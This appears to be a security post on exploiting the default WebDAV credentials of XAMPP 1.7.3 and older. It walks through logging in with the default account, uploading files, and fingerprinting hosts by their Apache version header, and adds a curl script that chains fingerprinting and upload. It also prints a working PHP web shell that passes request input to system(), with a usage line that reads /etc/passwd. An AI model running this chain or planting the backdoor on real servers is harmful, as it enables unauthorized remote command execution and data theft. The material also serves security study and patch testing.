1. download/install cadaver
apt-get install cadaver
2. login to the XAMPP server's WebDAV folder (cadaver prompts for a username and password; XAMPP's default WebDAV account is username wampp, password xampp)
cadaver http://<REMOTE HOST>/webdav/
3. upload a file to the webdav folder from the cadaver prompt
put helloworld.txt
4. browse to your uploaded file
load http://<REMOTE HOST>/webdav/helloworld.txt in a browser
Vulnerable software (Windows version) download:
PHP-based payload (acquired from BackTrack 5.1):
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
// Whatever arrives in the "cmd" parameter (GET or POST) is handed straight to system()
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
To identify the version of XAMPP running on a server, look at the HTTP response headers sent by the Apache server. The example below shows the HTTP headers of a server running XAMPP 1.7.3. Note the version of Apache that was bundled with this version of XAMPP: Apache 2.2.14 shipped with XAMPP 1.7.3. You can use this pairing to estimate which version of XAMPP a given host runs. If the Apache version is 2.2.14 or below, then the XAMPP version is 1.7.3 or below, and a host running XAMPP 1.7.3 or below is possibly vulnerable to the WebDAV default credential design vulnerability. The Server header is only a hint, though: an administrator can trim or change it with Apache's ServerTokens directive, and Apache 2.2.14 is also used outside XAMPP. So when you find a server running Apache 2.2.14, you still need to determine whether XAMPP is installed. You can do that by requesting the XAMPP status URL on the host, http://<REMOTE HOST>/xampp/ (http://localhost/xampp/ when testing locally). If an HTTP authentication prompt or the XAMPP status page appears, the server is most likely running XAMPP.
Once you have identified an XAMPP installation of 1.7.3 or below, use the commands in the numbered steps above to log in from Linux and upload a file to the remote server with the default credentials (username wampp, password xampp).
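The fingerprinting rule from the paragraph above and the upload from the numbered steps, combined in one POSIX shell script. This is an added example and not code from the original post: it uses curl in place of cadaver, assumes curl is installed, and the host names and file names are placeholders. The Server header it checks against is a constructed sample modelled on an XAMPP 1.7.3 banner, not one captured from a real host, and the version comparison is generalized to any dotted Apache version rather than the single 2.2.14 case the text gives.

```shell
#!/bin/sh
# Added example, not code from the original post. Fingerprints a host's
# Apache version from its Server header, applies the post's rule
# (Apache <= 2.2.14 => possibly XAMPP <= 1.7.3), and uploads a file over
# WebDAV with XAMPP's default account (wampp/xampp) using curl instead of
# cadaver. Assumes curl is installed; host and file names are placeholders.

# Pull the Apache version (e.g. "2.2.14") out of a raw "Server: ..." line.
# Prints nothing if the header is not an Apache banner or has been trimmed
# with ServerTokens, so callers must treat an empty result as "unknown".
apache_version() {
    printf '%s\n' "$1" |
        sed -n 's/^[Ss]erver:[[:space:]]*Apache\/\([0-9][0-9.]*\).*/\1/p'
}

# version_le A B: exit 0 if dotted version A <= B (numeric, component-wise).
version_le() {
    _a=$1; _b=$2
    while [ -n "$_a" ] || [ -n "$_b" ]; do
        _ai=${_a%%.*}; _bi=${_b%%.*}
        [ -z "$_ai" ] && _ai=0
        [ -z "$_bi" ] && _bi=0
        [ "$_ai" -lt "$_bi" ] && return 0
        [ "$_ai" -gt "$_bi" ] && return 1
        case $_a in *.*) _a=${_a#*.} ;; *) _a= ;; esac
        case $_b in *.*) _b=${_b#*.} ;; *) _b= ;; esac
    done
    return 0
}

# The post's heuristic: XAMPP 1.7.3 shipped Apache 2.2.14, so an Apache
# version at or below 2.2.14 marks the host as possibly XAMPP 1.7.3 or older.
maybe_old_xampp() {
    _v=$(apache_version "$1")
    [ -n "$_v" ] && version_le "$_v" 2.2.14
}

# Live helpers (need network; not exercised by the constructed samples below).
fetch_server_header() {           # $1: base URL, e.g. http://<REMOTE HOST>/
    curl -sI "$1" | grep -i '^Server:'
}
webdav_put() {                    # $1: WebDAV URL, $2: local file to upload
    # Prints the HTTP status code; mod_dav answers 201 for a newly created file.
    curl -s -o /dev/null -w '%{http_code}' -u wampp:xampp -T "$2" "$1"
}

# Constructed sample banners (not captured from real hosts); the first is
# modelled on what XAMPP 1.7.3 for Windows advertises.
SAMPLE_XAMPP_173='Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_perl/2.0.4 Perl/v5.10.1'
SAMPLE_NEWER='Server: Apache/2.4.41 (Ubuntu)'
SAMPLE_OTHER='Server: nginx/1.18.0'

for s in "$SAMPLE_XAMPP_173" "$SAMPLE_NEWER" "$SAMPLE_OTHER"; do
    if maybe_old_xampp "$s"; then
        echo "possibly XAMPP <= 1.7.3: $s"
    else
        echo "not a match (version '$(apache_version "$s")'): $s"
    fi
done

# Against a live target, wire the pieces together like this:
#   maybe_old_xampp "$(fetch_server_header http://<REMOTE HOST>/)" &&
#       webdav_put http://<REMOTE HOST>/webdav/ helloworld.txt
```

The banner check deliberately returns "unknown" rather than "not XAMPP" when no Apache version can be parsed, since a trimmed Server header says nothing about what is behind it; the /xampp/ status page check from the text is still needed to confirm XAMPP before trying the default account.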
To show the potential impact of this design vulnerability, an attacker could use the WebDAV account to upload a PHP-based payload that gives remote command execution on the hosting server, then request it in the browser just as with the test file. An example of such a payload is the simple PHP backdoor listed above under "PHP-based payload".